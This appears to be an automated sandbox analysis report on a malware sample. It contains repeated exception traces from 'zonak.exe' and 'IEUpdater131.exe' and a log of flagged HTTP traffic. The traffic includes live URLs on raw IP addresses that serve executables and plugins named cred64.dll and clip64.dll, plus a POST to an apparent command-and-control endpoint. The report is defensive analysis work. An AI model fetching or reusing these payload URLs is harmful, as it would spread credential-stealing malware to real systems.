__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbc2c @ 0xe3bc2c zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbc2c @ 0xe3bc2c zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbc2c @ 0xe3bc2c zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbc2c @ 0xe3bc2c zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbc2c @ 0xe3bc2c zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbc2c @ 0xe3bc2c zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbc2c @ 0xe3bc2c zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbcfe @ 0xe3bcfe zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 14905484 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 9375744 registers.esi: 13570048 registers.ecx: 3930240	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbcfe @ 0xe3bcfe zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbcfe @ 0xe3bcfe zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbcfe @ 0xe3bcfe zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbcfe @ 0xe3bcfe zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbdf8 @ 0xe3bdf8 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 14905484 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 9375744 registers.esi: 13570048 registers.ecx: 2185538713	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbdf8 @ 0xe3bdf8 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbdf8 @ 0xe3bdf8 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbdf8 @ 0xe3bdf8 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbdf8 @ 0xe3bdf8 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbdf8 @ 0xe3bdf8 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbdf8 @ 0xe3bdf8 zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316015 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbe8e @ 0xe3be8e zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 14905484 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 9375744 registers.esi: 13570048 registers.ecx: 205621520	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbe8e @ 0xe3be8e zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x237204 exception.instruction: ud2 exception.module: zonak.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0xda7204 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 2 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:09 p.m.	stacktrace: zonak+0x2cbe8e @ 0xe3be8e zonak+0x2d0c56 @ 0xe40c56 zonak+0x25a8dc @ 0xdca8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: zonak+0x2371d9 exception.instruction: div eax exception.module: zonak.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0xda71d9 registers.esp: 3930212 registers.edi: 3930212 registers.eax: 0 registers.ebp: 3930240 registers.edx: 0 registers.ebx: 14316058 registers.esi: 0 registers.ecx: 3930248	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x7796f559 RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x7796f639 RtlUlonglongByteSwap+0xba5 RtlFreeOemString-0x20d35 ntdll+0x7df95 @ 0x7791df95 HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x757f14dd zonak+0x1127b6 @ 0xc827b6 zonak+0x1093cc @ 0xc793cc zonak+0xfb0fc @ 0xc6b0fc zonak+0x12cff2 @ 0xc9cff2 zonak+0x10dd83 @ 0xc7dd83 zonak+0x10e037 @ 0xc7e037 zonak+0x10abf8 @ 0xc7abf8 zonak+0x10ab24 @ 0xc7ab24 zonak+0x10ace6 @ 0xc7ace6 zonak+0x10ae4d @ 0xc7ae4d zonak+0xfb482 @ 0xc6b482 zonak+0x0 @ 0xb70000 0x3bf893 0x3bf8f4 exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653 exception.instruction: jmp 0x7796e667 exception.module: ntdll.dll exception.exception_code: 0xc0000374 exception.offset: 845395 exception.address: 0x7796e653 registers.esp: 3929628 registers.edi: 4636784 registers.eax: 3929644 registers.ebp: 3929748 registers.edx: 0 registers.ebx: 0 registers.esi: 4456448 registers.ecx: 2147483647	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cf21b @ 0x13ef21b ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965744 registers.edi: 20869260 registers.eax: 0 registers.ebp: 1965772 registers.edx: 2 registers.ebx: 15283012 registers.esi: 5 registers.ecx: 15283012	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cf21b @ 0x13ef21b ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x2371d9 exception.instruction: div eax exception.module: IEUpdater131.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0x13571d9 registers.esp: 1965744 registers.edi: 1965744 registers.eax: 0 registers.ebp: 1965772 registers.edx: 0 registers.ebx: 20279834 registers.esi: 0 registers.ecx: 1965952	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cf21b @ 0x13ef21b ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965744 registers.edi: 1965744 registers.eax: 0 registers.ebp: 1965772 registers.edx: 2 registers.ebx: 20279791 registers.esi: 0 registers.ecx: 1965952	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cf21b @ 0x13ef21b ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x2371d9 exception.instruction: div eax exception.module: IEUpdater131.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0x13571d9 registers.esp: 1965744 registers.edi: 1965744 registers.eax: 0 registers.ebp: 1965772 registers.edx: 0 registers.ebx: 20279834 registers.esi: 0 registers.ecx: 1965952	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cf21b @ 0x13ef21b ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x2371d9 exception.instruction: div eax exception.module: IEUpdater131.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0x13571d9 registers.esp: 1965744 registers.edi: 1965744 registers.eax: 0 registers.ebp: 1965772 registers.edx: 0 registers.ebx: 20279791 registers.esi: 0 registers.ecx: 1965952	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cf21b @ 0x13ef21b ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965744 registers.edi: 1965744 registers.eax: 0 registers.ebp: 1965772 registers.edx: 2 registers.ebx: 20279791 registers.esi: 0 registers.ecx: 1965952	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cf21b @ 0x13ef21b ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965744 registers.edi: 1965744 registers.eax: 0 registers.ebp: 1965772 registers.edx: 2 registers.ebx: 20279834 registers.esi: 0 registers.ecx: 1965952	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cf21b @ 0x13ef21b ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965744 registers.edi: 1965744 registers.eax: 0 registers.ebp: 1965772 registers.edx: 2 registers.ebx: 20279834 registers.esi: 0 registers.ecx: 1965952	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cbb50 @ 0x13ebb50 ieupdater131+0x2d0c56 @ 0x13f0c56 ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x2371d9 exception.instruction: div eax exception.module: IEUpdater131.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0x13571d9 registers.esp: 1965696 registers.edi: 20869260 registers.eax: 0 registers.ebp: 1965724 registers.edx: 0 registers.ebx: 15339520 registers.esi: 19533824 registers.ecx: 19533824	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cbb50 @ 0x13ebb50 ieupdater131+0x2d0c56 @ 0x13f0c56 ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965696 registers.edi: 1965696 registers.eax: 0 registers.ebp: 1965724 registers.edx: 2 registers.ebx: 20279791 registers.esi: 0 registers.ecx: 1965732	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cbc2c @ 0x13ebc2c ieupdater131+0x2d0c56 @ 0x13f0c56 ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965696 registers.edi: 20869260 registers.eax: 0 registers.ebp: 1965724 registers.edx: 2 registers.ebx: 15339520 registers.esi: 19533824 registers.ecx: 0	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cbc2c @ 0x13ebc2c ieupdater131+0x2d0c56 @ 0x13f0c56 ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965696 registers.edi: 1965696 registers.eax: 0 registers.ebp: 1965724 registers.edx: 2 registers.ebx: 20279834 registers.esi: 0 registers.ecx: 1965732	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cbc2c @ 0x13ebc2c ieupdater131+0x2d0c56 @ 0x13f0c56 ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965696 registers.edi: 1965696 registers.eax: 0 registers.ebp: 1965724 registers.edx: 2 registers.ebx: 20279834 registers.esi: 0 registers.ecx: 1965732	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cbc2c @ 0x13ebc2c ieupdater131+0x2d0c56 @ 0x13f0c56 ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x2371d9 exception.instruction: div eax exception.module: IEUpdater131.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0x13571d9 registers.esp: 1965696 registers.edi: 1965696 registers.eax: 0 registers.ebp: 1965724 registers.edx: 0 registers.ebx: 20279834 registers.esi: 0 registers.ecx: 1965732	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cbc2c @ 0x13ebc2c ieupdater131+0x2d0c56 @ 0x13f0c56 ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965696 registers.edi: 1965696 registers.eax: 0 registers.ebp: 1965724 registers.edx: 2 registers.ebx: 20279791 registers.esi: 0 registers.ecx: 1965732	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cbcfe @ 0x13ebcfe ieupdater131+0x2d0c56 @ 0x13f0c56 ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965696 registers.edi: 20869260 registers.eax: 0 registers.ebp: 1965724 registers.edx: 2 registers.ebx: 15339520 registers.esi: 19533824 registers.ecx: 1965724	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cbcfe @ 0x13ebcfe ieupdater131+0x2d0c56 @ 0x13f0c56 ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x2371d9 exception.instruction: div eax exception.module: IEUpdater131.exe exception.exception_code: 0xc0000094 exception.offset: 2322905 exception.address: 0x13571d9 registers.esp: 1965696 registers.edi: 1965696 registers.eax: 0 registers.ebp: 1965724 registers.edx: 0 registers.ebx: 20279834 registers.esi: 0 registers.ecx: 1965732	1
__exception__ Jan. 20, 2024, 6:10 p.m.	stacktrace: ieupdater131+0x2cbcfe @ 0x13ebcfe ieupdater131+0x2d0c56 @ 0x13f0c56 ieupdater131+0x25a8dc @ 0x137a8dc exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb exception.symbol: ieupdater131+0x237204 exception.instruction: ud2 exception.module: IEUpdater131.exe exception.exception_code: 0xc000001d exception.offset: 2322948 exception.address: 0x1357204 registers.esp: 1965696 registers.edi: 1965696 registers.eax: 0 registers.ebp: 1965724 registers.edx: 2 registers.ebx: 20279791 registers.esi: 0 registers.ecx: 1965732	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (13 events)

suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/go.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/go.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://185.215.113.68/mine/amer.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://185.215.113.68/mine/amer.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/nika.exe
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/nika.exe
suspicious_features	Connection to IP address	suspicious_request	HEAD http://109.107.182.3/cost/vimu.exe
suspicious_features	POST method with no referer header, POST method with no useragent header, Connection to IP address	suspicious_request	POST http://185.215.113.68/theme/index.php
suspicious_features	Connection to IP address	suspicious_request	GET http://109.107.182.3/cost/vimu.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/mine/livak.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/mine/zonak.exe
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/theme/Plugins/cred64.dll
suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://185.215.113.68/theme/Plugins/clip64.dll

Performs some HTTP requests (25 events)

request	HEAD http://109.107.182.3/cost/go.exe
request	GET http://109.107.182.3/cost/go.exe
request	HEAD http://185.215.113.68/mine/amer.exe
request	GET http://185.215.113.68/mine/amer.exe
request	HEAD http://109.107.182.3/cost/nika.exe
request	GET http://109.107.182.3/cost/nika.exe
request	HEAD http://109.107.182.3/cost/vimu.exe
request	POST http://185.215.113.68/theme/index.php
request	GET http://109.107.182.3/cost/vimu.exe
request	GET http://185.215.113.68/mine/livak.exe
request	GET http://185.215.113.68/mine/zonak.exe
request	GET http://185.215.113.68/theme/Plugins/cred64.dll
request	GET http://185.215.113.68/theme/Plugins/clip64.dll
request	GET http://www.maxmind.com/geoip/v2.1/city/me
request	GET http://ie9cvlist.ie.microsoft.com/IE9CompatViewList.xml
request	GET https://db-ip.com/demo/home.php?s=175.208.134.152
request	GET https://accounts.google.com/
request	GET https://accounts.google.com/ServiceLogin?passive=1209600&continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F
request	GET https://accounts.google.com/InteractiveLogin?continue=https://accounts.google.com/&followup=https://accounts.google.com/&passive=1209600&ifkv=ASKXGp3-cnxAB265cMjA870JRwXCWmEackG0gZBWgg8enHGTomo63RZ5p2GNDc8fgTCQ6vFgzSFjkw
request	GET https://accounts.google.com/v3/signin/identifier?continue=https%3A%2F%2Faccounts.google.com%2F&followup=https%3A%2F%2Faccounts.google.com%2F&ifkv=ASKXGp0MB1Kt9JRng3yyk_pct8ZP3zuC3fBqZFRXuexVmEhTR_dTxy42kBpfUijZBBTyoL_snfrEWg&passive=1209600&flowName=WebLiteSignIn&flowEntry=ServiceLogin&dsh=S487216895%3A1705742046920610
request	GET https://accounts.google.com/_/bscframe
request	GET https://ssl.gstatic.com/images/branding/googlelogo/2x/googlelogo_color_74x24dp.png
request	GET https://accounts.google.com/favicon.ico
request	GET https://accounts.google.com/generate_204?vBMMBg
request	GET https://www.google.com/favicon.ico

